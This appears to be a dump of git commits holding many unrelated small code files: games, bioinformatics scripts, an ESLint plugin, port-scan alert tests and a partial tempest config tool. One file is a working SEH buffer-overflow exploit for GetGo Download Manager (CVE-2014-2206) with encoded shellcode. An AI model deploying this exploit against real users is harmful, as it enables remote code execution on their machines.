    __name = "2048"                     # window title
    __size = [450, 450]                 # window size in pixels
    __background_color = "#AA9C99"
    __square_size = [98, 98]            # tile size in pixels
    __square_clean_color = "#BBADA0"    # colour of an empty tile
    __square_space = 12                 # gap between tiles
    x_pos = y_pos = __square_space      # drawing cursor, reset by draw_square()
    play_block = []                     # shared flattened 4x4 board
    square_font_name = font.Font(None, 25)
    def new_game(self):
        """Create the window surface and reset the board with two '2' tiles."""
        self.screen = pygame.display.set_mode(self.__size)
        pygame.display.set_caption(self.__name)
        self.bg = pygame.Surface(self.__size)
        self.bg.fill(pygame.Color(self.__background_color))
        # Reset the shared board *in place* instead of appending: the old
        # append loop made the board grow by 16 extra cells every time
        # new_game() was called again.  del lst[:] works on Python 2 and 3.
        del self.play_block[:]
        self.play_block.extend([0] * 16)
        self.new_square()
        self.new_square()
    def draw_square(self):
        """Repaint the 16 tiles (and their values) left-to-right, top-down."""
        self.x_pos = self.y_pos = self.__square_space
        for i in range(16):
            pf = pygame.Surface(self.__square_size)
            if self.play_block[i] == 0:
                pf.fill(pygame.Color(self.__square_clean_color))
            else:
                p_color = Square().color(self.play_block[i])
                pf.fill(pygame.Color(p_color))
            self.screen.blit(pf, (self.x_pos, self.y_pos))
            if self.play_block[i] > 0:
                self.screen.blit(self.square_font_name.render(str(self.play_block[i]), 1, (0, 0, 0)), (self.x_pos + 10, self.y_pos + 10))
            # Advance the cursor; wrap to the next row after four tiles.
            self.x_pos += self.__square_size[0] + self.__square_space
            if self.x_pos == (self.__square_size[0] + self.__square_space) * 4 + self.__square_space:
                self.x_pos = self.__square_space
                self.y_pos += self.__square_size[0] + self.__square_space
    def new_square(self):
        """Place a '2' on a random empty cell.

        NOTE(review): loops forever if the board is full -- callers must
        guarantee at least one empty cell.
        """
        p_rand_pos = randint(0, 15)
        while self.play_block[p_rand_pos] != 0:
            p_rand_pos = randint(0, 15)
        self.play_block[p_rand_pos] = 2
class Square(Window):
    """Input handling and tile colours; operates on the board shared via Window."""
    def key(self, event):
        """Apply one arrow-key move to the shared board.

        For each direction the board is scanned up to 16 passes; in a pass a
        tile either merges into an equal neighbour (then the pass is
        restarted via ``break``) or slides into an empty neighbour cell.
        If anything moved, a new '2' tile is spawned.
        """
        p_flag = False
        # --- LEFT: skip the leftmost column (indices 0, 4, 8, 12) ---
        if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:
            for j in range(16):
                for i in range(16):
                    if i != 0 and i != 4 and i != 8 and i != 12 and self.play_block[i] > 0:
                        if self.play_block[i - 1] == self.play_block[i]:
                            self.play_block[i - 1] = self.play_block[i]*2
                            self.play_block[i] = 0
                            p_flag = True
                            break
                        if self.play_block[i - 1] == 0:
                            self.play_block[i - 1] = self.play_block[i]
                            self.play_block[i] = 0
                            p_flag = True
                            continue
            if p_flag == True:
                p_flag = False
                self.new_square()
        p_flag = False
        # --- RIGHT: scan backwards, skip the rightmost column (3, 7, 11, 15) ---
        if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:
            for j in range(16):
                for i in range(15, -1, -1):
                    if i != 3 and i != 7 and i != 11 and i != 15 and self.play_block[i] > 0:
                        if self.play_block[i + 1] == self.play_block[i]:
                            self.play_block[i + 1] = self.play_block[i]*2
                            self.play_block[i] = 0
                            p_flag = True
                            break
                        if self.play_block[i + 1] == 0:
                            self.play_block[i + 1] = self.play_block[i]
                            self.play_block[i] = 0
                            p_flag = True
                            continue
            if p_flag == True:
                p_flag = False
                self.new_square()
        p_flag = False
        # --- UP: skip the top row (indices 0..3); neighbour is i - 4 ---
        if event.type == pygame.KEYDOWN and event.key == pygame.K_UP:
            for j in range(16):
                for i in range(16):
                    if i != 0 and i != 1 and i != 2 and i != 3 and self.play_block[i] > 0:
                        if self.play_block[i - 4] == self.play_block[i]:
                            self.play_block[i - 4] = self.play_block[i]*2
                            self.play_block[i] = 0
                            p_flag = True
                            break
                        if self.play_block[i - 4] == 0:
                            self.play_block[i - 4] = self.play_block[i]
                            self.play_block[i] = 0
                            p_flag = True
                            continue
            if p_flag == True:
                p_flag = False
                self.new_square()
        p_flag = False
        # --- DOWN: scan backwards, skip the bottom row (12..15); neighbour is i + 4 ---
        if event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:
            for j in range(16):
                for i in range(15, -1, -1):
                    if i != 12 and i != 13 and i != 14 and i != 15 and self.play_block[i] > 0:
                        if self.play_block[i + 4] == self.play_block[i]:
                            self.play_block[i + 4] = self.play_block[i]*2
                            self.play_block[i] = 0
                            p_flag = True
                            break
                        if self.play_block[i + 4] == 0:
                            self.play_block[i + 4] = self.play_block[i]
                            self.play_block[i] = 0
                            p_flag = True
                            continue
            if p_flag == True:
                p_flag = False
                self.new_square()
    def color(self, value):
        """Return the background colour for a tile value (2048-style palette).

        NOTE(review): returns None for values with no match (e.g. 0 or
        non-power-of-two); callers only pass values > 0 taken from the board.
        """
        if value == 2: return "#EEE4DA"
        if value == 4: return "#EDE0C8"
        if value == 8: return "#F2B179"
        if value == 16: return "#F59563"
        if value == 32: return "#F67C5F"
        if value == 64: return "#F65E3B"
        if value == 128: return "#EDCF72"
        if value == 256: return "#EDCC61"
        if value == 512: return "#EDC850"
        if value == 1024: return "#EDC53F"
        if value == 2048: return "#EDC22E"
        if value > 2048: return "#3C3A32"
# Single game window; Square instances below share its class-level board.
win = Window()
def main():
    """Initialise pygame and run the event/redraw loop until the window closes."""
    pygame.init()
    win.new_game()
    while 1:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                raise SystemExit
            # A fresh Square per event; it mutates the shared class-level board.
            Square().key(event)
        win.screen.blit(win.bg, (0,0))
        win.draw_square()
        pygame.display.update()
if __name__ == "__main__":
    main()
| Python | 0.998661 | |
387d05dbdb81bacc4851adffbfd7f827e709d4cc | Add Step class - Create Step.py to hold code for the Step class. - The Step class represents a single step/instruction for a Recipe object. | Step.py | Step.py | # Step object
class Step:
    """A single step/instruction belonging to a Recipe."""
    def __init__(self, description):
        """Store the human-readable text of this step."""
        self.description = description
    def __repr__(self):
        """Unambiguous representation, useful when inspecting recipes."""
        return "Step(%r)" % self.description
| Python | 0 | |
7d8a566ac51e7e471603c2160dce2046eb698738 | add sn domains conversion tool | conv.py | conv.py | #!/usr/bin/env python
# Read the wiki for more infomation
# https://github.com/lennylxx/ipv6-hosts/wiki/sn-domains
import sys
table = '1023456789abcdefghijklmnopqrstuvwxyz'
def iata2sn(iata):
global table
sn = ''
for v in iata[0:3]:
i = ((ord(v) - ord('a')) * 7 + 5) % 36
sn += table[i]
return sn
def sn2iata(sn):
global table
iata = ''
for v in sn:
i = table.index(v)
i = (5 - i % 7) * 5 + i / 7 + 10
iata += table[i]
return iata
def num2code(num):
global table
code = ''
for v in num:
i = ((ord(v) - ord('0') + 1) * 7) % 36
code += table[i]
return code
def code2num(code):
global table
num = ''
for v in code:
i = table.index(v)
i = i / 7 + i % 7 - 1
num += str(i)
return num
def main():
    """Command line entry point: convert IATA->SN (-i) or SN->IATA (-s)."""
    if len(sys.argv) != 3:
        # Parenthesised single-argument print works on Python 2 and 3 alike.
        print('usage:\n\t./%s -i iata\n\t./%s -s sn'
              % (sys.argv[0], sys.argv[0]))
        sys.exit(1)

    # Renamed from "input" so the builtin of the same name is not shadowed.
    arg = sys.argv[2]
    ret = ''
    if sys.argv[1] == '-i':
        # Layout: chars 0-2 IATA letters, 3-4 digits, 5 marker, 6-7 digits.
        ret += iata2sn(arg[0:3])
        ret += num2code(arg[3:5])
        ret += 'n'
        ret += num2code(arg[6:8])
        print(ret)
    elif sys.argv[1] == '-s':
        ret += sn2iata(arg[0:3])
        ret += code2num(arg[3:5])
        ret += 's'
        ret += code2num(arg[6:8])
        print(ret)
    else:
        print('Unknown option.')
        sys.exit(1)

if __name__ == '__main__':
    main()
| Python | 0 | |
d2bdbd0d851fda046c0be55105a211a382c22766 | Add Day 2 | day2.py | day2.py | #Advent of Code December 2
#Written by icydoge - icydoge AT gmail dot com
# Each line of paper.txt is a box spec "LxWxH".  Part one: surface area plus
# smallest-face slack.  Part two: smallest-face perimeter plus volume (bow).
with open('paper.txt') as f:
    # Filter out empty lines instead of blindly dropping the last element:
    # splitlines() yields no empty final entry for a file ending in a single
    # newline, so the old "[:-1]" silently discarded the last box there.
    content = [line for line in f.read().splitlines() if line]
part_one_answer = 0
part_two_answer = 0
for box in content:
    # Sorting puts the two smallest dimensions first.
    dimensions = sorted(map(int, box.split('x')))
    slack = dimensions[0] * dimensions[1]          # area of the smallest face
    wrapping = 2 * (dimensions[0] * dimensions[1] + dimensions[1] * dimensions[2] + dimensions[0] * dimensions[2])
    ribbon = (dimensions[0] + dimensions[1]) * 2   # smallest face perimeter
    bow = dimensions[0] * dimensions[1] * dimensions[2]
    part_one_answer += wrapping + slack
    part_two_answer += ribbon + bow
# Single-argument print() behaves identically on Python 2 and 3.
print("Total square feet of wrapping paper (Part One): %d" % part_one_answer)
print("Total feet of ribbon (Part Two): %d" % part_two_answer)
acf4ad1e5948354281fec040badfe412f5194529 | add wsgi | flaskr/flaskr.wsgi | flaskr/flaskr.wsgi | <VirtualHost *>
    # Public hostname served by this virtual host.
    ServerName example.com
    # Run the Flask app in its own mod_wsgi daemon process group.
    WSGIDaemonProcess flaskr user=user1 group=group1 threads=5
    # Map the site root to the WSGI entry-point script.
    WSGIScriptAlias / /var/www/FlaskDB/flaskr/flaskr.wsgi
    <Directory /var/www/FlaskDB/flaskr>
        WSGIProcessGroup flaskr
        # %{GLOBAL} forces the main interpreter (needed by some C extensions).
        WSGIApplicationGroup %{GLOBAL}
        # Apache 2.2 style access control: allow all clients.
        Order deny,allow
        Allow from all
    </Directory>
</VirtualHost>
b6fbdd70a0486718d711a7efc310e350a1837b9c | add collapse reads code | seqcluster/collapse.py | seqcluster/collapse.py | import os
from libs.fastq import collapse, splitext_plus
import logging
logger = logging.getLogger('seqbuster')
def collapse_fastq(args):
    """Collapse a fastq file (after adapter trimming) into unique reads.

    Writes ``<basename>_trimmed.fastq`` in ``args.out`` with one record per
    distinct sequence, encoding the duplicate count in the read name.
    """
    idx = 0
    try:
        seqs = collapse(args.fastq)
        out_file = splitext_plus(os.path.basename(args.fastq))[0] + "_trimmed.fastq"
    except IOError as e:
        logger.error("I/O error({0}): {1}".format(e.errno, e.strerror))
        # Re-raise the original IOError: the old code raised a plain string,
        # which is not a valid exception object (TypeError on modern Python).
        raise
    logger.info("writing output")
    with open(os.path.join(args.out, out_file), 'w') as handle:
        for seq in seqs:
            idx += 1
            # NOTE(review): seqs[seq] appears to be a read object exposing
            # .get() (quality chars) and .times (count) -- defined in libs.fastq.
            qual = "".join(seqs[seq].get())
            counts = seqs[seq].times
            handle.write(("@seq_{idx}_x{counts}\n{seq}\n+\n{qual}\n").format(**locals()))
| Python | 0.000001 | |
871ec5597059934bce64f7d31fa7e5ab165063ee | Add basic GUI frontend | memorise-frontend.py | memorise-frontend.py | #!/usr/bin/env python
# -*- Coding: utf-8 -*-
from tkinter import Tk, Menu
from ttk import Frame, Button, Style
class MemoriseFrontend(Frame):
    """Main window frame: a padded 5x5 grid holding four direction buttons."""
    version = "0.1-py"
    padding = 10   # uniform grid padding in pixels
    def __init__(self, parent):
        Frame.__init__(self, parent)
        self.parent = parent
        self.style = Style()
        self.style.theme_use("default")
        self._initUI()
    def _initUI(self):
        """Build the widget grid and the Up/Left/Right/Down buttons."""
        self.parent.title("Memorise v" + self.version)
        # Pad all five rows and columns uniformly (replaces ten copy-pasted
        # columnconfigure/rowconfigure calls).
        for index in range(5):
            self.columnconfigure(index, pad=self.padding)
            self.rowconfigure(index, pad=self.padding)
        # Direction buttons arranged as a cross around the grid centre.
        btnUp = Button(self, text="Up", command=self._onUpBtn)
        btnUp.grid(row=1, column=2)
        btnLeft = Button(self, text="Left", command=self._onLeftBtn)
        btnLeft.grid(row=2, column=1)
        btnRight = Button(self, text="Right", command=self._onRightBtn)
        btnRight.grid(row=2, column=3)
        btnDown = Button(self, text="Down", command=self._onDownBtn)
        btnDown.grid(row=3, column=2)
        self.pack()
    # Button callbacks -- not implemented yet.
    def _onUpBtn(self):
        pass
    def _onLeftBtn(self):
        pass
    def _onRightBtn(self):
        pass
    def _onDownBtn(self):
        pass
def main():
    """Create the Tk root window, attach the frontend and start the event loop."""
    root = Tk()
    MemoriseFrontend(root)   # the frame packs itself into root in _initUI()
    root.mainloop()

if __name__ == "__main__":
    # Guard so importing this module no longer launches the GUI.
    main()
| Python | 0 | |
db81e8ca0b0321994f188daf45211e6ae2dda4a4 | Make a control dataset that only contains sequences with titer data. | dengue/utils/make_titer_strain_control.py | dengue/utils/make_titer_strain_control.py | from Bio import SeqIO
from pprint import pprint
# Strains appearing as the *test* virus (column 0) in the titer table.
with open('../../data/dengue_titers.tsv', 'r') as f:
    titerstrains = set(line.split()[0] for line in f)
# Strains appearing as the *serum* virus (column 1).
with open('../../data/dengue_titers.tsv', 'r') as f:
    serastrains = set(line.split()[1] for line in f)
# Autologous strains: measured against their own serum.
autologous = titerstrains.intersection(serastrains)
print(len(autologous))
# Keep only sequences whose strain name (first '|'-field of the fasta
# description) has autologous titer data.  Use a context manager so the
# fasta handle is closed instead of leaked by an anonymous open().
with open('../../data/dengue.fasta', 'r') as handle:
    strains_with_titers = [s for s in SeqIO.parse(handle, 'fasta')
                           if s.description.split('|')[0] in autologous]
SeqIO.write(strains_with_titers, '../../data/control.fasta', 'fasta')
# Single-argument print() behaves identically on Python 2 and 3.
print('Found %d strains with autologous titers and sequence data.' % len(strains_with_titers))
| Python | 0.00001 | |
9a67c8eca45daa2f706e8fc6bde958c37229c837 | Create mpd_mouse_control.py | mpd_mouse_control.py | mpd_mouse_control.py | from evdev import InputDevice
from select import select
import os
import mpd
import socket
import alsaaudio
import time
# Persistent handles: MPD client and the pointing device.
client = mpd.MPDClient(use_unicode=True)
dev = InputDevice('/dev/input/event2')
# When a button is held while scrolling (seek gesture), the eventual button
# release must not also trigger its click action; these flags swallow that
# single release event.
drop_lb_event = False
drop_rb_event = False
while True:
    r,w,x = select([dev], [], [])
    try:
        for event in dev.read():
            client.connect("192.168.0.2", 6600)
            if event.code == 8:   # scroll wheel
                if 272 in dev.active_keys():    # left button held: seek 5s
                    drop_lb_event = True
                    if (event.value > 0):
                        client.seekcur("+5")
                    else:
                        client.seekcur("-5")
                elif 273 in dev.active_keys():  # right button held: seek 30s
                    drop_rb_event = True
                    if (event.value > 0):
                        client.seekcur("+30")
                    else:
                        client.seekcur("-30")
                else:                           # plain scroll: volume +/- 2
                    mixer = alsaaudio.Mixer("PCM", **{"cardindex": 1})
                    if (event.value > 0):
                        mixer.setvolume(int(mixer.getvolume()[0])+2, -1)
                    else:
                        mixer.setvolume(int(mixer.getvolume()[0])-2, -1)
            try:
                if event.code == 272 and event.value == 0:   # left release: previous
                    if drop_lb_event:
                        drop_lb_event = False
                    else:
                        client.previous()
                if event.code == 273 and event.value == 0:   # right release: next
                    if drop_rb_event:
                        drop_rb_event = False
                    else:
                        client.next()
                if event.code == 274 and event.value == 1:   # middle press: toggle
                    if client.status()["state"] == "stop":
                        client.play()
                    else:
                        client.pause()
                os.system("/usr/sbin/qcontrol usbled off")
                client.disconnect()
            # BUGFIX: "except mpd.ConnectionError, socket.error:" (old Py2
            # bind-form) only caught ConnectionError and rebound the name
            # socket.error to it; the tuple form catches both types.
            except (mpd.ConnectionError, socket.error):
                pass
    # Same bind-form bug as above: OSError was never actually caught before.
    except (IOError, OSError):
        # Device node vanished (e.g. mouse re-plugged): wait and reopen.
        time.sleep(5)
        dev = InputDevice('/dev/input/event2')
| Python | 0.000002 | |
d1024a2892c6e171b3d465d56c8a1fad25d7fbdc | Create ESLint styler | zazu/plugins/eslint_styler.py | zazu/plugins/eslint_styler.py | # -*- coding: utf-8 -*-
"""eslint plugin for zazu."""
import zazu.styler
zazu.util.lazy_import(locals(), [
'subprocess',
'os',
'tempfile'
])
__author__ = "Patrick Moore"
__copyright__ = "Copyright 2018"
class eslintStyler(zazu.styler.Styler):
    """ESLint plugin for code styling."""
    def style_string(self, string):
        """Fix a string to be within style guidelines.

        Writes the string to a temporary ``.js`` file, runs ``eslint --fix``
        on it and returns the (possibly rewritten) file contents.
        """
        # mode='w' so a str payload also works on Python 3, where the
        # NamedTemporaryFile default mode is binary.
        temp = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix=".js")
        temp_path = temp.name
        args = ['eslint', '--fix'] + self.options + [temp_path]
        temp.write(string)
        temp.close()
        try:
            # eslint rewrites the file in place; a non-zero exit (violations
            # it could not auto-fix) is deliberately not fatal here.
            subprocess.check_output(args)
        except subprocess.CalledProcessError:
            pass
        try:
            with open(temp_path, "r") as f:
                ret = f.read()
        finally:
            # Always clean up the temp file, even if the read fails.
            os.remove(temp_path)
        return ret
    @staticmethod
    def default_extensions():
        """Return the list of file extensions that are compatible with this Styler."""
        return ['*.js']
    @staticmethod
    def type():
        """Return the string type of this Styler."""
        return 'eslint'
| Python | 0 | |
6d53fcd788ef985c044657a6bf2e6faa5b8b9673 | Create CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | #!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
# PoC flow: pose as an HTTP server; the vulnerable download manager overflows
# an SEH-protected buffer while parsing an oversized response status line.
host = "192.168.0.1"
port = 80
# Wait for the victim client to connect and request a download.
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
# Overflow layout: 4107 bytes of NOP padding up to the SEH record.
junk0 = "\x90" * 4107
# Next-SEH field: short jump (EB 06) over the SEH pointer into the NOPs.
nseh = "\x90\x90\xEB\x06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "\x90" * 50
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload = junk0 + nseh + seh + nops + shellcode
# The payload rides inside the HTTP status line of the crafted response.
buffer = "HTTP/1.1 200 "+payload+"\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
| Python | 0.000011 | |
7cf6d0d214fe0ef8c93bf661e008b256a35a8def | Add tests for unauth_portscan alert | tests/alerts/test_unauth_portscan.py | tests/alerts/test_unauth_portscan.py | from positive_alert_test_case import PositiveAlertTestCase
from negative_alert_test_case import NegativeAlertTestCase
from alert_test_suite import AlertTestSuite
class TestAlertUnauthPortScan(AlertTestSuite):
    """Alert-plugin test suite for the unauthorized port scan bro notice.

    NOTE(review): the partial event dicts in the negative/positive cases
    below appear to be merged over ``default_event`` by the test suite base
    class -- confirm in AlertTestSuite.
    """
    alert_filename = "unauth_portscan"
    # This event is the default positive event that will cause the
    # alert to trigger
    default_event = {
        "_type": "bro",
        "_source": {
            "category": "bronotice",
            "summary": "Scan::Port_Scan 1.2.3.4 scanned at least 12 unique ports of host 5.6.7.8 in 0m3s local",
            "eventsource": "nsm",
            "hostname": "nsmhost",
            "details": {
                "uid": "",
                "actions": "Notice::ACTION_LOG",
                "note": "Scan::Port_Scan",
                "sourceipv4address": "0.0.0.0",
                "indicators": [
                    "1.2.3.4"
                ],
                "msg": "1.2.3.4 scanned at least 12 unique ports of host 5.6.7.8 in 0m3s",
                "destinationipaddress": "5.6.7.8",
            },
        }
    }
    # This alert is the expected result from running this task
    default_alert = {
        'category': 'scan',
        'severity': 'NOTICE',
        'summary': "nsmhost: Unauthorized Port Scan Event from [u'1.2.3.4'] scanning ports on host 5.6.7.8",
        'tags': [],
        'url': 'https://mana.mozilla.org/wiki/display/SECURITY/NSM+IR+procedures',
    }
    # Positive cases must produce default_alert; each negative case breaks
    # exactly one of the filter conditions (type, category, source, details
    # fields or the event-age window around 30 minutes).
    test_cases = [
        PositiveAlertTestCase(
            description="Positive test case with good event",
            events=[default_event],
            expected_alert=default_alert
        ),
        PositiveAlertTestCase(
            description="Positive test case with an event with somewhat old timestamp",
            events=[
                {
                    "_source": {
                        "utctimestamp": AlertTestSuite.subtract_from_timestamp_lambda({'minutes': 29})
                    }
                }
            ],
            expected_alert=default_alert
        ),
        NegativeAlertTestCase(
            description="Negative test case with bad event type",
            events=[
                {
                    "_type": "event",
                }
            ],
        ),
        NegativeAlertTestCase(
            description="Negative test case with bad category",
            events=[
                {
                    "_source": {
                        "category": "Badcategory",
                    }
                }
            ],
        ),
        NegativeAlertTestCase(
            description="Negative test case with bad eventsource",
            events=[
                {
                    "_source": {
                        "eventsource": "Badeventsource",
                    }
                }
            ],
        ),
        NegativeAlertTestCase(
            description="Negative test case with non existent details.indicators",
            events=[
                {
                    "_source": {
                        "details": {
                            "indicators": None,
                        }
                    }
                }
            ],
        ),
        NegativeAlertTestCase(
            description="Negative test case with bad details.note",
            events=[
                {
                    "_source": {
                        "details": {
                            "note": "Badnote",
                        }
                    }
                }
            ],
        ),
        NegativeAlertTestCase(
            description="Negative test case with old timestamp",
            events=[
                {
                    "_source": {
                        "utctimestamp": AlertTestSuite.subtract_from_timestamp_lambda({'minutes': 31})
                    }
                }
            ],
        ),
    ]
| Python | 0 | |
690b5a994bc20b561632d9aa3e332061457a3d72 | Add missing __init__.py to overkiz tests (#62727) | tests/components/overkiz/__init__.py | tests/components/overkiz/__init__.py | """Tests for the overkiz component."""
| Python | 0.000001 | |
c6b9788296f87a88655778b5d604316f3df11199 | Initial basic setup of openstack and tempest config file | tools/tempest_auto_config.py | tools/tempest_auto_config.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Config
import ConfigParser
import os
# Default client libs
import keystoneclient.v2_0.client as keystone_client
# Import Openstack exceptions
import keystoneclient.exceptions as keystone_exception
DEFAULT_CONFIG_DIR = "%s/etc" % os.path.abspath(os.path.pardir)
DEFAULT_CONFIG_FILE = "tempest.conf"
DEFAULT_CONFIG_SAMPLE = "tempest.conf.sample"
# Environment variables override defaults
TEMPEST_CONFIG_DIR = os.environ.get('TEMPEST_CONFIG_DIR') or DEFAULT_CONFIG_DIR
TEMPEST_CONFIG = os.environ.get('TEMPEST_CONFIG') or "%s/%s" % \
(TEMPEST_CONFIG_DIR, DEFAULT_CONFIG_FILE)
TEMPEST_CONFIG_SAMPLE = os.environ.get('TEMPEST_CONFIG_SAMPLE') or "%s/%s" % \
(TEMPEST_CONFIG_DIR, DEFAULT_CONFIG_SAMPLE)
# Admin credentials
OS_USERNAME = os.environ.get('OS_USERNAME')
OS_PASSWORD = os.environ.get('OS_PASSWORD')
OS_TENANT_NAME = os.environ.get('OS_TENANT_NAME')
OS_AUTH_URL = os.environ.get('OS_AUTH_URL')
# Image references
IMAGE_ID = os.environ.get('IMAGE_ID')
IMAGE_ID_ALT = os.environ.get('IMAGE_ID_ALT')
class ClientManager(object):
    """
    Manager that provides access to the official python clients for
    calling various OpenStack APIs.
    """
    def __init__(self):
        # One slot per OpenStack service client; all start out unset.
        for attr in ('identity_client', 'image_client', 'network_client',
                     'compute_client', 'volume_client'):
            setattr(self, attr, None)

    def get_identity_client(self, **kwargs):
        """
        Return the openstack identity python client, creating it on first use.

        :param username: a string representing the username
        :param password: a string representing the user's password
        :param tenant_name: a string representing the tenant name of the user
        :param auth_url: a string representing the auth url of the identity
        :param insecure: True if we wish to disable ssl certificate validation,
        False otherwise
        :returns: an instance of openstack identity python client
        """
        if not self.identity_client:
            self.identity_client = keystone_client.Client(**kwargs)
        return self.identity_client
def getTempestConfigSample():
    """
    Gets the tempest sample configuration file as a ConfigParser object
    :return: the parsed tempest sample configuration
    """
    config_sample = ConfigParser.ConfigParser()
    # Use a context manager so the sample file handle is closed instead of
    # being leaked by an anonymous open() call.
    with open(TEMPEST_CONFIG_SAMPLE) as sample_file:
        config_sample.readfp(sample_file)
    return config_sample
def update_config_admin_credentials(config, config_section):
    """
    Updates the tempest config with the admin credentials
    :param config: an object representing the tempest config file
    :param config_section: the section name where the admin credentials are
    """
    # All four admin settings must be present in the environment.
    if not all((OS_AUTH_URL, OS_USERNAME, OS_PASSWORD, OS_TENANT_NAME)):
        raise Exception("Admin environment variables not found.")

    # TODO(tkammer): Add support for uri_v3
    admin_params = {
        'uri': OS_AUTH_URL,
        'admin_username': OS_USERNAME,
        'admin_password': OS_PASSWORD,
        'admin_tenant_name': OS_TENANT_NAME,
    }
    update_config_section_with_params(config, config_section, admin_params)
def update_config_section_with_params(config, section, params):
    """
    Updates a given config object with given params
    :param config: the object representing the config file of tempest
    :param section: the section we would like to update
    :param params: the parameters we wish to update for that section
    """
    for option in params:
        config.set(section, option, params[option])
def get_identity_client_kwargs(config, section_name):
    """
    Get the required arguments for the identity python client
    :param config: the tempest configuration file
    :param section_name: the section name in the configuration where the
    arguments can be found
    :return: a dictionary representing the needed arguments for the identity
    client
    """
    def get_option(option):
        return config.get(section_name, option)

    return {
        'username': get_option('admin_username'),
        'password': get_option('admin_password'),
        'tenant_name': get_option('admin_tenant_name'),
        'auth_url': get_option('uri'),
        'insecure': get_option('disable_ssl_certificate_validation'),
    }
def create_user_with_tenant(identity_client, username, password, tenant_name):
    """
    Creates a user using a given identity client
    :param identity_client: openstack identity python client
    :param username: a string representing the username
    :param password: a string representing the user's password
    :param tenant_name: a string representing the tenant name of the user
    """
    # Try to create the necessary tenant
    tenant_id = None
    try:
        tenant_description = "Tenant for Tempest %s user" % username
        tenant = identity_client.tenants.create(tenant_name,
                                                tenant_description)
        tenant_id = tenant.id
    except keystone_exception.Conflict:
        # if already exist, use existing tenant
        # NOTE(review): if the existing tenant is somehow absent from the
        # list, tenant_id silently stays None and the user is created
        # without a tenant.
        tenant_list = identity_client.tenants.list()
        for tenant in tenant_list:
            if tenant.name == tenant_name:
                tenant_id = tenant.id
    # Try to create the user
    try:
        # A synthetic email address is required by the keystone user API.
        email = "%s@test.com" % username
        identity_client.users.create(name=username,
                                     password=password,
                                     email=email,
                                     tenant_id=tenant_id)
    except keystone_exception.Conflict:
        # if already exist, use existing user
        pass
def create_users_and_tenants(identity_client,
                             config,
                             identity_section):
    """
    Creates the two non admin users and tenants for tempest
    :param identity_client: openstack identity python client
    :param config: tempest configuration file
    :param identity_section: the section name of identity in the config
    """
    # Create the primary and the alternate test user, each in its own tenant.
    for user_key, password_key, tenant_key in (
            ('username', 'password', 'tenant_name'),
            ('alt_username', 'alt_password', 'alt_tenant_name')):
        create_user_with_tenant(identity_client,
                                config.get(identity_section, user_key),
                                config.get(identity_section, password_key),
                                config.get(identity_section, tenant_key))
def main():
    """
    Main module to control the script
    """
    # TODO(tkammer): add support for existing config file
    config_sample = getTempestConfigSample()
    # Inject the admin credentials taken from the OS_* environment variables.
    update_config_admin_credentials(config_sample, 'identity')
    client_manager = ClientManager()
    # Set the identity related info for tempest
    identity_client_kwargs = get_identity_client_kwargs(config_sample,
                                                        'identity')
    identity_client = client_manager.get_identity_client(
        **identity_client_kwargs)
    # Create the necessary users and tenants for tempest run
    create_users_and_tenants(identity_client,
                             config_sample,
